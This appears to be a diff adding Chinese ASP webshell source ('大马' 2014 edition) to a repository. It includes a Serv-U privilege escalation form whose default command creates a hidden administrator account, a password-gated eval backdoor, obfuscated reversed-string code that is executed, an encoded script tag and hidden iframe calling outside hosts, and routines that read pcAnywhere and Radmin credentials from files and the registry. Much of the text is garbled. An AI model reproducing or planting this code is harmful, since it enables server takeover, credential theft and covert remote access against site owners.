+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"downloads":downloads()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body><iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe></html>" 
+%></body></html>
+</body></html>
+</body></html>
+
diff --git a/www-7jyewu-cn/银河舰队大马_2014版.asp b/www-7jyewu-cn/银河舰队大马_2014版.asp
new file mode 100644
index 0000000..3bd9690
--- /dev/null
+++ b/www-7jyewu-cn/银河舰队大马_2014版.asp
@@ -0,0 +1,1189 @@
+<%
+UserPass	="admin"'      	  		 	����
+clientPassword	="admin"'				���ɺ���һ�仰����
+siteurl="www.7jyewu.cn"
+mNametitle	="���ӽ��Ӵ���_2012��"'  	 			
+topad       ="����!�ſ��Ǹ�������,��������"
+Copyright	="�������ڷǷ���;�����������߸Ų�����"'				��Ȩ
+Server.ScriptTimeout=999999999
+bs=False
+ShowFileIco=False
+IcoPath=""	
+durl=""
+Response.Buffer =true
+On Error Resume Next 
+strBAD="<script language=vbscript runat=server>"
+strBAD=strBAD&"If Request("""&clientPassword&""")<>"""" Then Session(""#"")=Request("""&clientPassword&""")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+strBAD=strBAD&"</script>"	
+Const DEfd=""
+sub ShowErr()
+  If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+Function RePath(S)
+  RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+  RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+execute(shisanfun(")��emaNF��(tseuqeR=emaNF��prevres=pp��UrevreS=uu��)��lru��(selbairavrevres.tseuqer=lru��ssaPresU=prevres��lru&)��tsoh_ptth��(selbaIRavreVRES.TSeuQeR=UrevreS��)��htaPredloF��(tseuqeR=htaPredloF��)��/��(htaPpaM.revreS=tooRWWW��)��.��(htaPpaM.revreS=htaPtooR��)��noitcA��(tseuqeR=noitcA��)��RDDA_LACOL��(selbairaVrevreS.tseuqeR=PIrevreS��)��DETALSNART_HTAP��(selbairaVrevreS.tseuqeR=OOOO��)��LRU��(selbairaVrevreS.tseuqeR=LRU"))
+Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """")
+For ShiSanI = 1 To Len(ShiSanObjstr)
+ If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr
+ Else
+ShiSanNewStr = vbCrLf + ShiSanNewStr
+ End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject("Scripting.FileSystemObject")
+set fsoX=server.CreateObject("Scripting.FileSystemObject")
+str1=""&Request.ServerVariables("SERVER_Name"):BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+j"<title>"&mNametitle&" - "&ServerIP&" </title>"
+j"<style type=""text/css"">"
+j"body,td{font-size: 12px;background-color:#444;color:#FFFFFF;}"
+j"input,select,textarea{font-size: 12px;background-color:#ddd;border:1px solid #fff}"
+j".C{background-color:#444;border:0px}"
+j".cmd{background-color:#000;color:#FFF}"
+j"body{margin: 0px;margin-left:4px;}"
+j"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#444}"
+j".am{color:#888;font-size:11px;}"
+j"</style>"
+if bs=true then:j"<script src="&htp&"1.js>":else:j"<script>":end if:j"function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :
+If Action="" then j " scroll=no":j ">"
+DIm oBt(13,2)
+oBt(0,0) = "Scripting.FileSystemObject"
+  oBt(0,2) = "�ļ��������"
+Obt(1,0) = "wscript.shell"
+  obt(1,2) = "������ִ�����"
+obT(2,0) = "ADOX.Catalog"
+  ObT(2,2) = "ACCESS�������"
+oBt(3,0) = "JRO.JetEngine"
+  obt(3,2) = "ACCESSѹ�����"
+OBt(4,0) = "Scripting.Dictionary" 
+  ObT(4,2) = "�������ϴ��������"
+OBT(5,0) = "Adodb.connection"
+  oBT(5,2) = "���ݿ��������"
+oBT(6,0) = "Adodb.Stream"
+  oBT(6,2) = "�������ϴ����"
+OBT(7,0) = "SoftArtisans.FileUp"
+  OBT(7,2) = "SA-FileUp �ļ��ϴ����"
+obT(8,0) = "LyfUpload.UploadFile"
+  OBT(8,2) = "���Ʒ��ļ��ϴ����"
+oBT(9,0) = "Persits.Upload.1"
+  oBt(9,2) = "ASPUpload �ļ��ϴ����"
+obT(10,0) = "JMail.SmtpMail"
+  Obt(10,2) = "JMail �ʼ��շ����"
+obt(11,0) = "CDONTS.NewMail"
+  ObT(11,2) = "����SMTP�������"
+ObT(12,0) = "SmtpMail.SmtpMail.1"
+  oBT(12,2) = "SmtpMail�������"
+OBT(13,0) = "Microsoft.XMLHTTP"
+  OBt(13,2) = "���ݴ������"
+fOr I=0 tO 13
+	Set T=serVER.CReATEoBJEcT(obT(I,0))
+	If -2147221005 <> err Then
+	  ISoBJ=" ��"
+	ELSE
+	  ISobj=" ��"
+	  eRr.cLEar
+	eNd iF
+	Set T=nOthInG
+	oBt(i,1)=IsoBj
+neXt
+IF foLderPaTH<>"" Then
+  sEssioN("FolderPath")=rRepatH(fOlDeRpATH)
+EnD If
+If SeSSIoN("FolderPath")="" THEN
+  fOLDERpAth=RoOTpaTH
+  SESSIOn("FolderPath")=fOLDeRPatH
+end IF
+
+
+Function PcAnywhere4()
+j"<div align='center'>PcAnywhere��Ȩ Bin�汾</div><form name='xform' method='post'><table width='80%'border='0'><tr><td width='10%'>cif�ļ�: </td><td width='10%'><input name='path' type='text' value='C:\Documents and Settings\All Users\Application Data\\Symantec\pcAnywhere\Citempl.cif' size='80'></td><td><input type='submit' value=' �ύ '></td></table>"
+end Function
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+Function StreamLoadFromFile(sPath)
+Dim oStream
+Set oStream = Server.CreateObject("Adodb.Stream")
+With oStream
+.Type = 1
+.Mode = 3
+.Open
+.LoadFromFile(sPath)
+.Position = 0
+StreamLoadFromFile = .Read
+.Close
+End With
+Set oStream = Nothing
+End Function
+Function hexdec(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+ j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+ j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+ j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+ j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+ j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+ j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+ j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+ j = j * 16 
+Next 
+result = result + j 
+Next 
+hexdec = result 
+End Function 
+Function PcAnywhere(data,mode)
+HASH= Mid(data,3)
+If mode = "pass" Then number = 32: Cifnum = 144
+If mode = "user" Then number = 30: Cifnum = 15
+For i = 1 To number Step 2 
+pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum)
+If ((pcstr <= 32) Or (pcstr>127)) Then Exit For 
+decode = decode + Chr(pcstr)
+Cifnum=Cifnum+1
+Next 
+PcAnywhere=decode
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+Set WSH= Server.CreateObject("WSCRIPT.SHELL")
+RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
+Parameter="Parameter"
+Port = "Port"
+j"<br>ע��:����HASHֵ����RadminHash���߻�od�������ӣ��������ص�ַ:"&htp&"soft/Radmin_hash.rar<br><br>"
+ParameterArray=WSH.REGREAD(RadminPath & Parameter )
+j Parameter&":"
+If IsArray(ParameterArray) Then
+For i = 0 To UBound(ParameterArray)
+If  Len (hex(ParameterArray(i)))=1 Then 
+strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
+Else
+strObj = strObj & Hex(ParameterArray(i))
+End If 
+Next
+j strobj
+Else
+j"Error! Can't Read!"
+End If
+j"<br><br>"
+PortArray=WSH.REGREAD(RadminPath & Port )
+If IsArray(PortArray) Then 
+j Port &":" 
+j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
+Else 
+j"Error! Can't Read!"
+End If
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function:Function MainForm()
+execute(shisanfun("��>elbat/<>rt/<>dt/<��j��:��>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<��j��:��>dt<��j��:��>dt/<>emarfi/<>'0'=redrobemarf '%001'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<��j��:��>'071'=htdiw dt<>rt<>rt/<>dt/<>elbat/<>mrof/<>rt/<>dt/<��j��:��>dt<>dt/<��>a/<stnemucoD>')���\\stnemucoD\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<pmeT>')���\\pmeT\\swodniw\\:c���(redloFwohS:tpircsavaj'=ferh a<����>a/<atad>')���\\atad\\vrsteni\\23metsys\\SWODNIW\\:c���(redloFwohS:tpircsavaj'=ferh a<����>a/<gifnoc>')���\\gifnoc\\23metsys\\SWODNIW\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<LQS>')���\\revreS LQS tfosorciM\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<revreSlaeR>')���laeR\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<u-vres>')���\\u-vres\\seliF margorP\\:c���(redloFwohS:tpircsavaj'=ferh a<����>a/<erehwynAcp>')���\\erehwynAcp\\cetnamyS\\ataD noitacilppA\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<RELCYCER\:D>')���\\RELCYCER\\:D���(redloFwohS:tpircsavaj'=ferh a<����>a/<RELCYCER\\:C>')���\\RELCYCER\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<��� >b/<��>b< ʼ��>')���\\���\\���ˡ�ʼ����\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<sresUllA>')���\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh a<����>a/<margorP>')���seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh a<��������¼Ŀ>rt<��j��:��>'elddim'=ngilav 'retnec'=ngila rt<  ��j��: ��>')(daoler.noitacol.emarFeliF'=kcilcno '�ڴ�����ˢ'=eulav 'timbus'=epyt tupni< >'��ת'=eulav 'timbus'=epyt 'timbuS'=eman tupni<>'retnec'=ngila '041'=htdiw dt<>dt/<��j��:��>'��&)��htaPredloF��(noISseS&��'=eulav '%001:htdiw'=elyts 'htaPredloF'=eman tupni<��j��:��>dt<>dt/<����ַ��>'retnec'=ngila '06'=htdiw dt<>rt<��j��:��>'tnerap_'=tegrat '��&lrU&��'=noitca 'tsop'=dohtem 'mrofrdda'=eman mrof<��j��:��>'%001'=htdiw elbat<��j��:��>'2'=napsloc '03'=thgieh dt<>rt<��j��:��>'0'=gnicapsllec '1'=gniddapllec 0=redrob  '%001'=thgieh '%001'=htdiw elbat<��j��:��>mrof/<��j��:��>���emaNF���=eman ���neddih���=epyt tupni<��j��:��>���noitcA���=eman ���neddih���=epyt tupni<��j��:��>���emarFeliF���=tegrat ����&Lru&����=noitca ���tsop���=dohtem ���mrofedih���=eman mrof<��j"))
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+acode="=s?psa.s/xs/moc.pxe"&"yado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf))
+ExeCuTe(ShiSanFun("buS dnE��gnihtoN = redloFeht teS��txeN��fI dnE��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��eslE ��maerts ,sr ,htaP.meti bdMroFeerTas��nehT eurT = redloFsI.meti fI��smetI.redloFeht nI meti hcaE roF��)htaPeht(ecapSemaN.Xas = redloFeht teS���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTas buS��buS dnE��pooL��fI dnE��0 = i��eslE ��)��\�� ,)1 + i ,htaPeht(diM(rtsnI + i = i��nehT )��\�� ,)1 + i ,htaPeht(diM(rtSnI fI��fI dnE��))1 - i ,htaPeht(tfeL(redloFetaerC.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS��nehT eslaF = ))i ,htaPeht(tfeL(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��0 > i elihW oD��)��\�� ,htaPeht(rtsnI = i��i miD��)htaPeht(redloFetaerc buS��buS dnE��gnihtoN = nnoc teS��gnihtoN = maerts teS��gnihtoN = sr teS��gnihtoN = sw teS��esolC.maerts��esolC.nnoc��esolC.sr��pooL��txeNevoM.sr��2 ,)��htaPeht��(sr & rts eliFoTevaS.maerts��)��tnetnoCelif��(sr etirW.maerts��)(soEteS.maerts��fI dnE��)redloFeht & rts(redloFetaerc��nehT eslaF = )redloFeht & rts(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��))��\�� ,)��htaPeht��(sr(veRrtSnI ,)��htaPeht��(sr(tfeL = redloFeht��foE.sr litnU oD��1 = epyT.maerts��nepO.maerts��1 ,1 ,nnoc ,��ataDeliF�� nepO.sr��rtSnnoc nepO.nnoc���;�� & htaPeht & ��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��noitcennoC.BDODA��(tcejbOetaerC = nnoc teS��)��maertS.BDODA��(tcejbOetaerC = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC = sr teS���\�� & )��.��(htaPpaM.revreS = rts��redloFeht ,rtSnnoc ,maerts ,nnoc ,rts ,sw ,sr miD��000001=tuOemiTtpircS.revreS��txeN emuseR rorrE nO��)htaPeht(kcaPnu buS��)emanf&��\��&toorwww(eliFtxeTetaerC.osf=esonpser tes��noitcnuF dnE��gnihtoN = redloFeht teS��gnihtoN = sredlof teS��gnihtoN = selif teS��txeN��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��selif nI meti hcaE roF��txeN��maerts ,sr ,htaP.meti bdMroFeerTosf��sredlof nI meti hcaE roF��sredloFbuS.redloFeht = sredlof teS��seliF.redloFeht = selif teS��)htaPeht(redloFteG.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS = redloFeht teS��fI dnE��)��!�ʷ����ʲ��߻��ڴ治¼Ŀ �� & htaPeht(rrEwohs��nehT eslaF = )htaPeht(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,selif ,sredlof ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTosf noitcnuF��buS dnE��gnihtoN = golataCoda teS��gnihtoN = maerts teS��gnihtoN = nnoc teS��gnihtoN = sr teS��esolC.maerts��esolC.nnoC��esolC.sr��fI dnE��maerts ,sr ,htaPeht bdMroFeerTas��eslE ��maerts ,sr ,htaPeht bdMroFeerTosf��nehT ��osf�� = )��dohteMeht��(tseuqeR fI��3 ,3 ,nnoc ,��ataDeliF�� nepO.sr��1 = epyT.maerts��nepO.maerts��)��)egamI tnetnoCelif ,rahCraV htaPeht ,DERETSULC YEK YRAMIRP )1,0(YTITNEDI tni dI(ataDeliF elbaT etaerC��(etucexE.nnoc��rtSnnoc nepO.nnoc��rtSnnoc etaerC.golataCoda��)��bdm.HSH��(htaPpaM.revreS & ��=ecruoS ataD ;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��golataC.XODA��(tcejbOetaerC.revreS = golataCoda teS��)��noitcennoC.BDODA��(tcejbOetaerC.revreS = nnoc teS��)��maertS.BDODA��(tcejbOetaerC.revreS = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC.revreS = sr teS��golataCoda ,rtSnnoc ,maerts ,nnoc ,sr miD��txeN emuseR rorrE nO��)htaPeht(bdMoTdda buS��buS dnE���>mrof/<��¼Ŀ��̱���λ������������������ :ע>rb<>rb<>'������'=eulav timbus=epyt tupni<>tcAeht=eman bdMmorFesaeler=eulav neddih=epyt tupni<>08=ezis ���bdm.HSH\�� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<>/rb<:)��֧OSF��(���������>/rh<>mrof/<��¼Ŀ��ͬ��ľmas��λ,����bdm.HSH�������� :ע>rb<>rb<>'����ʼ��'=eulav timbus=epyt tupni<>tceles/<>noitpo/<OSF��>ppa=eulav noitpo<>noitpo/<OSF>osf=eulav noitpo<>dohteMeht=eman tceles<>tcAeht=eman bdMoTdda=eulav neddih=epyt tupni<>08=ezis ���� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<:����м���>rb<��j��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/<!��������>rb<>retnec=ngila vid<�� j��)htaPeht(kcaPnu��nehT ��bdMmorFesaeler�� = tcAeht fI��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/<!��������>rb<>retnec=ngila vid<�� j��)htaPeht(bdMoTdda��nehT ��bdMoTdda�� = tcAeht fI��000001=tuOemiTtpircS.revreS��)��htaPeht��(tseuqeR = htaPeht��)��tcAeht��(tseuqeR = tcAeht��htaPeht ,tcAeht miD��)(bdMoTddAegaP buS��"))
+
+
+
+Function ProFile()
+execute(shisanfun("IS j���>elbat/<>mrof/<��&IS=IS���>rt/<>dt/<>'�̽�������������һ��'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>05=thgieh dt<>dt/<;psbn&>dt<>rt<��&IS=IS���>rt/<>dt/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��1ΪС��( �� >/ ���)'',g/]d\^[/(ecalper.eulav=eulav���=puyekno ���5���=ezis ���1���=eulav ���thgir:ngila-txet���=elyts ���emiTA���=eman ���txet���=epyt tupni<>dt<>dt/<����Ƶ����>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 8-FTU>/ ���2���=eulav ���rahCA���=eman ���oidar���=epyt tupni<  2132BG>/ dekcehc ���1���=eulav ���rahCA���=eman ���oidar���=epyt tupni<>dt<>dt/<��������>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<�������>���7���=swor ���07���=sloc ���edoCA���=eman aeratxet<>dt<>dt/<���������>thgir=ngila ���;xp3:pot-gniddap���=elyts pot=ngilav dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<��&)��psa.tset\��&)��htaPredloF��(noisseS(htaPeRR&��>���7���=swor ���07���=sloc ���eliFA���=eman aeratxet<��&IS=IS���>dt<>dt/<>tnof/<;psbn&;psbn&��·���ĸ�һ��ÿ>rb<;psbn&;psbn&���ĸ��໤��ʱͬ��>wolley=roloc tnof<>rb<����·���ĵĻ���Ҫ��>���0���=eulav ���avvv���=eman ���neddih���=epyt tupni<>thgir=ngila 'xp22:thgieh-enil'=elyts pot=ngilav dt<>rt<��&IS=IS���'tsoP=2noitcA&eliForP=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<��&IS=IS���>'0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<��=IS��fI dnE��dnE.esnopseR���>rb<>retnec/<���̽�����>a/<����>knalb_=tegrat ��&2ssap&��=eliForP?��&LRU&��=ferh ���dlob:thgiew-tnof;enilrednu:noitaroced-txet���=elyts a<���㣡���ɳ��� >tnof/<��&2ssap&��>wolley=roloc tnof< �̽�����>retnec<>rb<>rb<>rb<��j��)��rahCA��(tseuqer=)��rahC��&2ssap(noitacilppA��)��emiTA��(tseuqer=)��emiT��&2ssap(noitacilppA��)��edoCA��(tseuqer=)��edoC��&2ssap(noitacilppA��)��eliFA��(tseuqer=)��eliF��&2ssap(noitacilppA��1=)2ssap(noitacilppA��)2ssap(esacu=2ssap�� pool��1mun&2ssap=2ssap��fi dne�� 9~0' ))84+dnr*)84-75((rhC(rtSC=1mun��esle�� z~a' ))79+dnr*)79-221((rhC(rtSC=1mun��neht 